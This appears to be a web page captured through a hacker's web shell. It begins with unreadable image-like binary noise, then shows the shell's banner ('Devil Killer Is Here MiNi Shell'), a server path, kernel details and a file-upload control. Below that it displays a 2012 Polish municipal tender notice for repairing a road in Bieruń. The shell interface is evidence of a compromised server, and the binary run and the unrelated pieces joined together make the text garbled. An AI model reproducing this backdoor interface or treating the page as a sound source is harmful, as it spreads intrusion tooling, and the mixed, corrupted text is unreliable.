JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/81313-N-2012.html

<p class="kh_header"><b>Bieruń: Remont ul. Skowronków wraz z drogami bocznymi w Bieruniu</b><br>
<b>Numer ogłoszenia: 81313 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ul. Skowronków wraz z drogami bocznymi w Bieruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont drogi gminnej ul. Skowronków (na odcinku od skrzyżowania z  ul. Wawelską do przepustu) wraz z dwoma drogami bocznymi , o łącznej długości 1285 mb. Droga została uszkodzona podczas powodzi w maju 2010 roku.
Do realizacji przedmiotu zamówienia stosuje się zapisy ustawy z dnia 11.08.2001r. o szczególnych zasadach odbudowy, remontu i rozbiórek obiektów budowlanych,  zniszczonych lub uszkodzonych          w wyniku działania żywiołu (Dz. U. 2001.84.906 z późniejszymi zmianami). 

A.	Zakres rzeczowy zamówienia określono w  dokumentacji technicznej i przedmiarze robót, który obejmuje w szczególności : 
 a/ Rozbiórkę nawierzchni z betonu asfaltowego grub. 5 cm		   		 -  2 406,72 m2    
 b/ Korytowanie na głębokość 50 cm			  				 -  3 608,90 m2  
 c/ Korytowanie na głębokość 30 cm							 -     398,00 m2 
 d/ Wykonanie nawierzchni z kostki betonowej wraz z podbudową tłuczniową 	 -     792,50 m2 
 e/ Zabudowę oporników drogowych 12x25 cm na ławie betonowej			 -  2 100,00 mb 
 f/ Zabudowę obrzeży betonowych 8x30 cm 						 -     298,00 mb
 g/ Separacja podłoża geowłókniną			 		 		 -  3 178,40 m2 
 h/ Wykonanie warstwy odsączającej grub. 17 cm i podbudowy z kruszywa łamanego 
     grub. 20 cm 										 -  3 608,90 m2 
 i/ Wykonanie podbudowy zasadniczej z betonu asfaltowego grub. 7 cm 
    i nawierzchni z betonu asfaltowego w dwóch warstwach 6+5 cm	 		 -  3 178,40 m2 
 j/  Ułożenie nawierzchni z betonu asfaltowego gr. 5 cm na dojazdach do posesji	 -     736,00 m2 
 k/  Plantowanie poboczy									 -  1 282,00 m2
 l/   Uzupełnienie poboczy tłuczniem							 -     964,00 m2
 m/ Regulacja pionowa studzienek dla urządzeń podziemnych			 -       60 szt.
 n/  Wywóz gruzu i gruntu z korytowania wraz z utylizacją				 -   1 851,80 m3  
 o/ Demontaż i montaż słupków ze znakami drogowymi (z odzysku) 			 -       18 szt.
 p/ Demontaż starych i montaż nowych elementów progów zwalniających 
     o wymiarach 90x50x5 cm								 -        12 szt.
 r/ Remont cząstkowy nawierzchni z kostki betonowej na podsypce cem.piaskowej	 -        20,00 m2
 s/ Wzmocnienie skarp płytami ażurowymi o wym. 60x40x10 cm			 -      102,00 m2
  
   B. Zakres zamówienia obejmuje również :
1)	Uzyskanie uzgodnień i zatwierdzeń projektu organizacji ruchu w zakresie oznakowania na drodze wojewódzkiej ul. Wawelskiej (Zamawiający posiada zatwierdzony projekt organizacji ruchu           w zakresie dróg gminnych), zatwierdzony projekt należy przekazać zamawiającemu przed odbiorem oznakowania.
2)	Prawidłowe oznakowanie miejsca robót oraz zapewnienia warunków bezpieczeństwa na drodze     w okresie ich wykonywania.
3)	Bieżące utrzymanie oraz czyszczenie dróg, z których będzie korzystał Wykonawca w czasie realizacji zadania.
4)	Naprawę szkód wyrządzonych osobom trzecim w toku realizacji robót.
5)	Przywrócenie terenu zajętego w czasie realizacji zadania do stanu pierwotnego wraz                              z uzyskaniem oświadczeń właścicieli terenu o braku zastrzeżeń do granic i stanu terenu  po wykonaniu robót.
6)	Zabezpieczenie dojść i dojazdów do poszczególnych nieruchomości w okresie prowadzenia robót.
7)	Zabezpieczenie możliwości dojazdu pojazdów uprzywilejowanych (straż, pogotowie itp.).
8)  Dowóz (pobór) brakujących mas ziemnych i odwóz nadmiaru mas ziemnych na odkład.
9)  Składowanie materiałów rozbiórkowych.
10) Wykonanie dokumentacji fotograficznej z datami wykonania zdjęć wszystkich obiektów    
     kubaturowych, ogrodzeń, innych obiektów sąsiadujących z remontowaną drogą, którą należy     
     wykonać przed przystąpieniem do robót, w trakcie oraz po zakończeniu robót (bezwzględnie      
     elementy ulegające zakryciu).
11) Zagospodarowanie i ochrona placu budowy; wykonanie zasilania placu budowy  w energię    
          elektryczną i wodę. 
    12) Wykonanie wszystkich niezbędnych badań i sprawdzeń wynikających ze Specyfikacji Technicznej 
         Wykonania i Odbioru Robót Budowlanych (STWiORB), nie ujętych w przedmiarze robót.
C.	Informacje uzupełniające 
W cenie ofertowej należy uwzględnić wszystkie koszty wynikłe z zapisów  STWiORB  .   
Jeżeli w dokumentacji projektowej,  STWiORB oraz SIWZ  określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w  specyfikacji technicznej wykonania i odbioru robót. Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i art.7 ustawy pzp, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu jakościowego, technologicznego i estetycznego.
Zabudowane i dostarczone materiały budowlane muszą posiadać wszystkie wymagane Prawem budowlanym i polskimi normami, przenoszącymi zharmonizowane normy europejskie, atesty, certyfikaty i aprobaty techniczne. Przed wbudowaniem wykonawca przedstawi  świadectwa dopuszczenia do stosowania materiałów i wyrobów do zabudowy - do akceptacji  przez inspektora nadzoru.
Odpowiedzialność wykonawcy z tytułu gwarancji za wady w odniesieniu do całego przedmiotu zamówienia ma obejmować okres minimum 24 miesięcy, licząc od daty odbioru końcowego przedmiotu zamówienia.
Zamawiający nie przewiduje: zaliczek na poczet wykonania zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów  w rozumieniu ustawy pzp oraz stosowania wymagań określonych w art.29 ust.4 ustawy pzp. 
Zamawiający nie dopuszcza składania ofert wariantowych i częściowych .
Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie art. 67 ust.1 pkt 6 ustawy pzp 
w przypadku posiadania przez zamawiającego dodatkowych środków na finansowanie zamówienia, 
w zakresie wykonania : a/ nawierzchni z kostki betonowej wraz z podbudową tłuczniową - 150,00 m2;
b/ nawierzchni z betonu asfaltowego wraz z podbudową tłuczniową - 578,40 m2;c/ remontu cząstkowego nawierzchni z kostki betonowej na podsypce cem.piaskowej - 200,00 m2; d/ uzupełnienia poboczy tłuczniem - 150,00 m2. 
Kod Wspólnego Słownika Zamówień CPV : 
45111200-0	Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45233140-2	Roboty drogowe
45233222-1	Roboty budowlane w zakresie układania chodników i asfaltowania  
45233252-0 	Roboty  w zakresie nawierzchni ulic
45233290-8	Instalowanie znaków drogowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie art. 67 ust.1 pkt 6 ustawy pzp 
w przypadku posiadania przez zamawiającego dodatkowych środków na finansowanie zamówienia, 
w zakresie wykonania : a/ nawierzchni z kostki betonowej wraz z podbudową tłuczniową - 150,00 m2;
b/ nawierzchni z betonu asfaltowego wraz z podbudową tłuczniową - 578,40 m2;c/ remontu cząstkowego nawierzchni z kostki betonowej na podsypce cem.piaskowej - 200,00 m2; d/ uzupełnienia poboczy tłuczniem - 150,00 m2.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.31.40-2, 45.23.32.22-1, 45.23.32.52-0, 45.23.32.90-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę: 
- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Posiadają wiedzę i doświadczenie: 
Wykonali zgodnie ze sztuką budowlaną i prawidłowo ukończyli w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - to w tym okresie - co najmniej jedną robotę budowlaną w zakresie budowy, przebudowy lub remontu  dróg, placów, parkingów  o wartości min. 1 000 000,00 zł brutto.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
-    oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp),
-    wykazu wykonanych robót w zakresie budowy, przebudowy lub remontu  dróg, placów, 
      parkingów  , w tym co najmniej jednej roboty o wartości min. 1 000 000,00 zł brutto, z podaniem 
      ich rodzaju i wartości, daty i miejsca  wykonania oraz załączeniem 
-    dokumentów potwierdzających, że roboty te zostały wykonane zgodnie  z  zasadami sztuki budowlanej i prawidłowo ukończone (np. referencji, protokołów końcowych odbioru robót).
Przez -wykonali- zamawiający rozumie, że roboty  zostały zakończone i odebrane protokołami 	końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert,
a jeżeli okres jest krótszy - w tym okresie.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena  warunku  
nastąpi łącznie tzn. należy wykazać, że warunek wykonania jednej ww. roboty o wartości brutto 
min.1 000 000,00 zł spełnia  przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
przedłożonego przez wykonawcę:
   - oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
Dysponują co najmniej jedną osobą posiadającą uprawnienia  do kierowania robotami     
drogowymi bez ograniczeń, która będzie uczestniczyć w wykonaniu zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
     przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp)
   - wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności                                             odpowiedzialnych za  kierowanie robotami budowlanymi (uprawnienia drogowe bez ograniczeń), wraz  z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, 
   a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.  
   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  wykazać, 
   że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie          
     przedłożonego przez wykonawcę :
- oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.Wykonawca przystępujący do postępowania złoży oświadczenie z art. 22 ust. 1 ustawy pzp, że :1.Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.Posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia; 3.Dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;4.Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
B.1.Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń oraz  w pkt. Lista wymaganych dokumentów.Zamiast dokumentu, o którym mowa w punkcie  3 Listy wymaganych dokumentów  
przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa powyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsca zamieszkania.
Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa w pkt 1niniejszej uwagi.2.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.3.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
4.Wykonawca  może  polegać  na  wiedzy  i  doświadczeniu ,  potencjale  technicznym ,  osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie   od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać: -  kto jest podmiotem przyjmującym zasoby, -  zakres zobowiązania podmiotu trzeciego,-  czego dotyczy zobowiązanie,-  w jaki sposób będzie zobowiązanie wykonane,-  jakiego okresu dotyczy zobowiązanie.5.Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może    przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego  
 warunku.6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/ spółki cywilnej) do oferty należy dołączyć : 
  a) Informację w zakresie stron wchodzących w skład podmiotu wspólnego oraz pełnomocnictwo określające zasady reprezentacji ze wskazaniem pełnomocnika ( lidera), jego zakresu działania i   uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem,Liderem.b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby warunki ,o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie. c) Dokumenty wymienione w pkt. V B ppkt. 1 i 2 Listy wymaganych dokumentów, powinny być 
złożony w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie. d) Dokumenty wymienione w pkt. V B ppkt. 3 i 4 Listy wymaganych dokumentów składa każdy z wykonawców wchodzących w skład podmiotu występującego wspólnie.e) Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność z oryginałem przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez wszystkich wykonawców wchodzących w skład tego podmiotu.
C.Do oferty zaleca się załączyć informacje  w zakresie części zamówienia, która zostanie powierzona podwykonawcom. W przypadku braku złożenia  
            informacji w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia części zamówienia podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w zakresie:
a.  Wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie                  
     z obowiązującą stawką. 
b. Zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem 
    wymagań określonych w SIWZ, jakie osoby te powinny spełniać. 
c. Zmiany terminu rozpoczęcia lub zakończenia wykonania przedmiotu umowy, w szczególności zmiany terminów wykonania robót budowlanych z powodu: niesprzyjających warunków atmosferycznych; zmiany przepisów; braku możliwości zakupu materiałów i urządzeń  niezbędnych do prowadzenia robót; okoliczności, których nie można było przewidzieć przy udzielaniu zamówienia; siły wyższej.
